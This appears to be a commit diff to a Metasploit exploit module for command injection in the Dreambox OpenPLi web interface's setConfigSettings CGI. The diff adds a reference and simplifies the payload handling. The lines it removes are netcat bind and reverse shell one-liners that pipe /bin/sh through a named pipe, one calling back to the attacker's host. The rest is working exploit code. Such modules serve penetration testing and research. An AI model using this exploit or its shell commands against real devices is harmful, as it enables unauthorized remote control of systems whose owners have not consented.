last adjustment

Author: m-1-k-3

modules/exploits/linux/http/dreambox_openpli_shell.rb

@@ -39,6 +39,7 @@ def initialize(info = {})
 					[ 'URL', 'http://openpli.org/wiki/Webif' ],
 					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ],
 					[ 'EDB', '24498' ],
+					[ 'BID', '57943' ],
 					[ 'OSVDB', '90230']
 				],
 			'Platform'	   => ['unix', 'linux'],
@@ -51,7 +52,7 @@ def initialize(info = {})
 					'Compat'	  =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'netcat-e generic'
+							'RequiredCmd' => 'netcat generic'
 						}
 				},
 			'Targets'		=>
@@ -75,14 +76,7 @@ def exploit
 
 		uri = '/cgi-bin/setConfigSettings'
 
-		if payl =~ /bind/
-					cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
-		elsif payl =~ /reverse/
-					cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc #{lhost} #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
-		else
-			#this is for typical command execution ... cmd/unix/generic 
-			cmd = Rex::Text.uri_encode(payload.encoded)
-		end
+		cmd = Rex::Text.uri_encode(payload.encoded)
 
 		vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}")
 		vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")